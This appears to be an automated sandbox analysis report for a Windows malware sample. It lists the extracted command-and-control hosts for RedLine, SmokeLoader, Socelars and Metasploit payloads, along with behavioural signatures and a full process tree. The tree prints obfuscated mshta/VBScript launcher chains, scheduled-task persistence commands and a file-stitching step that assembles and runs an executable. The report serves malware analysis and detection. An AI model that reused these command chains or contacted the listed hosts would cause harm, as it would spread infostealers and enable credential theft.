Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
102s -
max time network
182s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
10/11/2021, 14:50
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.hhgenice.top/
Extracted
Family
redline
C2
tatreriash.xyz:80
Extracted
Family
redline
Botnet
udptest
C2
193.56.146.64:65441
Extracted
Family
redline
Botnet
1011h
C2
charirelay.xyz:80
Extracted
Family
smokeloader
Version
2020
C2
http://misha.at/upload/
http://roohaniinfra.com/upload/
http://0axqpcc.cn/upload/
http://mayak-lombard.ru/upload/
http://mebel-lass.ru/upload/
http://dishakhan.com/upload/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 9 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
NSIS installer 4 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 28 IoCs
-
Suspicious use of WriteProcessMemory 62 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\Zzxc65t45YSBF9nqKHPuiSeU.exe"C:\Users\Admin\Pictures\Adobe Films\Zzxc65t45YSBF9nqKHPuiSeU.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\usQX7TOKBjRSa9cPQlo2Gsbn.exe"C:\Users\Admin\Pictures\Adobe Films\usQX7TOKBjRSa9cPQlo2Gsbn.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\_Kd5CPUs6K3DzCthdD6AU3i6.exe"C:\Users\Admin\Documents\_Kd5CPUs6K3DzCthdD6AU3i6.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\KrzMylGKMxrMR4vdwlYcwxIE.exe"C:\Users\Admin\Pictures\Adobe Films\KrzMylGKMxrMR4vdwlYcwxIE.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\L2OrsqhZxGmE1E2fWDTYrrYk.exe"C:\Users\Admin\Pictures\Adobe Films\L2OrsqhZxGmE1E2fWDTYrrYk.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\fSmnWOxFIn10IKyrPhMw2elg.exe"C:\Users\Admin\Pictures\Adobe Films\fSmnWOxFIn10IKyrPhMw2elg.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7ubD9jljRcPdjXqFcy0MdDNT.exe"C:\Users\Admin\Pictures\Adobe Films\7ubD9jljRcPdjXqFcy0MdDNT.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\7ubD9jljRcPdjXqFcy0MdDNT.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\7ubD9jljRcPdjXqFcy0MdDNT.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\7ubD9jljRcPdjXqFcy0MdDNT.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\7ubD9jljRcPdjXqFcy0MdDNT.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hPbvPn5DvDnforiYyb7WTZLv.exe"C:\Users\Admin\Pictures\Adobe Films\hPbvPn5DvDnforiYyb7WTZLv.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\LH2PDLjkI6hoCDnXz9pMSlRL.exe"C:\Users\Admin\Pictures\Adobe Films\LH2PDLjkI6hoCDnXz9pMSlRL.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ws58LMYLWOiPEEwvBd6GcVQ2.exe"C:\Users\Admin\Pictures\Adobe Films\ws58LMYLWOiPEEwvBd6GcVQ2.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\ws58LMYLWOiPEEwvBd6GcVQ2.exe"C:\Users\Admin\Pictures\Adobe Films\ws58LMYLWOiPEEwvBd6GcVQ2.exe" -u5⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lXsZ7GVJnW8z1lZ0f0L3cfRY.exe"C:\Users\Admin\Pictures\Adobe Films\lXsZ7GVJnW8z1lZ0f0L3cfRY.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\PrCbFC7HE12IFcCz8ryS06am.exe"C:\Users\Admin\Pictures\Adobe Films\PrCbFC7HE12IFcCz8ryS06am.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\0NWx0kNOKQ1nRUVQkmBY5lrF.exe"C:\Users\Admin\Pictures\Adobe Films\0NWx0kNOKQ1nRUVQkmBY5lrF.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LTPGU.tmp\0NWx0kNOKQ1nRUVQkmBY5lrF.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTPGU.tmp\0NWx0kNOKQ1nRUVQkmBY5lrF.tmp" /SL5="$30294,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0NWx0kNOKQ1nRUVQkmBY5lrF.exe"5⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1IYNv_7IKQZkDypclWavITb3.exe"C:\Users\Admin\Pictures\Adobe Films\1IYNv_7IKQZkDypclWavITb3.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 8963⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7GGNLEN_klAFHlC1YgYvMkAy.exe"C:\Users\Admin\Pictures\Adobe Films\7GGNLEN_klAFHlC1YgYvMkAy.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\SywOKNV_EKcaSnmbfQQRyeL3.exe"C:\Users\Admin\Pictures\Adobe Films\SywOKNV_EKcaSnmbfQQRyeL3.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QR7rjEU1N7ogY8KXNZSJXxCu.exe"C:\Users\Admin\Pictures\Adobe Films\QR7rjEU1N7ogY8KXNZSJXxCu.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\DxbrZzAnEDYtRbhdu7tqNojO.exe"C:\Users\Admin\Pictures\Adobe Films\DxbrZzAnEDYtRbhdu7tqNojO.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 6643⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 6803⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 6883⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 6443⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 11283⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 11843⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 11203⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1fS3yF8eipW5ZHgPiYtVTe2e.exe"C:\Users\Admin\Pictures\Adobe Films\1fS3yF8eipW5ZHgPiYtVTe2e.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 5523⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pjsWEdUnjZWZ3keggXND2i_w.exe"C:\Users\Admin\Pictures\Adobe Films\pjsWEdUnjZWZ3keggXND2i_w.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\PrpbbJZWt4YJXKrT4be1uk8_.exe"C:\Users\Admin\Pictures\Adobe Films\PrpbbJZWt4YJXKrT4be1uk8_.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\IQa2rCkswbdsU1dXjD7Iquks.exe"C:\Users\Admin\Pictures\Adobe Films\IQa2rCkswbdsU1dXjD7Iquks.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dDZjDIBa69w5wGYvo_O5DnKH.exe"C:\Users\Admin\Pictures\Adobe Films\dDZjDIBa69w5wGYvo_O5DnKH.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dDZjDIBa69w5wGYvo_O5DnKH.exe"C:\Users\Admin\Pictures\Adobe Films\dDZjDIBa69w5wGYvo_O5DnKH.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FemAQyKCc8h6JXF9XwZzfmYc.exe"C:\Users\Admin\Pictures\Adobe Films\FemAQyKCc8h6JXF9XwZzfmYc.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\v5rKqMcqx40a2ydINrpnbOIX.exe"C:\Users\Admin\Pictures\Adobe Films\v5rKqMcqx40a2ydINrpnbOIX.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\S9cWd4LzCnY5K2DkiBQo7Y8R.exe"C:\Users\Admin\Pictures\Adobe Films\S9cWd4LzCnY5K2DkiBQo7Y8R.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\S9cWd4LzCnY5K2DkiBQo7Y8R.exe"C:\Users\Admin\Pictures\Adobe Films\S9cWd4LzCnY5K2DkiBQo7Y8R.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7te1E2BlkrIyAs_3ZbNr0_dd.exe"C:\Users\Admin\Pictures\Adobe Films\7te1E2BlkrIyAs_3ZbNr0_dd.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\_90Ji_B6CHsmvIxMbim0aBKa.exe"C:\Users\Admin\Pictures\Adobe Films\_90Ji_B6CHsmvIxMbim0aBKa.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\_90Ji_B6CHsmvIxMbim0aBKa.exe" & exit3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IyybWC2LtI0SYw92kxtUq2cj.exe"C:\Users\Admin\Pictures\Adobe Films\IyybWC2LtI0SYw92kxtUq2cj.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\C0A9XfJ_5wd1nSZRqwKSm1mC.exe"C:\Users\Admin\Pictures\Adobe Films\C0A9XfJ_5wd1nSZRqwKSm1mC.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\C0A9XfJ_5wd1nSZRqwKSm1mC.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\C0A9XfJ_5wd1nSZRqwKSm1mC.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\C0A9XfJ_5wd1nSZRqwKSm1mC.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\C0A9XfJ_5wd1nSZRqwKSm1mC.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "C0A9XfJ_5wd1nSZRqwKSm1mC.exe" -F5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yFF_KELjDNHU_4pFVjdedvzq.exe"C:\Users\Admin\Pictures\Adobe Films\yFF_KELjDNHU_4pFVjdedvzq.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\2378053.exe"C:\Users\Admin\AppData\Roaming\2378053.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\4417232.exe"C:\Users\Admin\AppData\Roaming\4417232.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\7741300.exe"C:\Users\Admin\AppData\Roaming\7741300.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\1418081.exe"C:\Users\Admin\AppData\Roaming\1418081.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\4055177.exe"C:\Users\Admin\AppData\Roaming\4055177.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\7408226.exe"C:\Users\Admin\AppData\Roaming\7408226.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\7408226.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\7408226.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\7408226.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\7408226.exe" ) do taskkill /F /Im "%~Nxk"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"8⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"9⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\GKq1GTV.ZnM9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM10⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "7408226.exe"6⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\6594567.exe"C:\Users\Admin\AppData\Roaming\6594567.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\78vdA1CLVfKSJhEqstwFgyTv.exe"C:\Users\Admin\Pictures\Adobe Films\78vdA1CLVfKSJhEqstwFgyTv.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\jPvfkjsR22lyWfa078kkjVwH.exe"C:\Users\Admin\Pictures\Adobe Films\jPvfkjsR22lyWfa078kkjVwH.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 5523⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8QTmsdvRB71JJCYalLSCsLVF.exe"C:\Users\Admin\Pictures\Adobe Films\8QTmsdvRB71JJCYalLSCsLVF.exe"2⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
156KB
-
Filesize
1.3MB
-
Filesize
228KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
39.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
232KB
-
Filesize
36KB
-
Filesize
524KB
-
Filesize
39.6MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
80KB
-
Filesize
8.6MB
-
Filesize
4.1MB
-
Filesize
384KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
176KB
-
Filesize
4KB
-
Filesize
184KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
4KB
-
Filesize
3.7MB
-
Filesize
88KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
4KB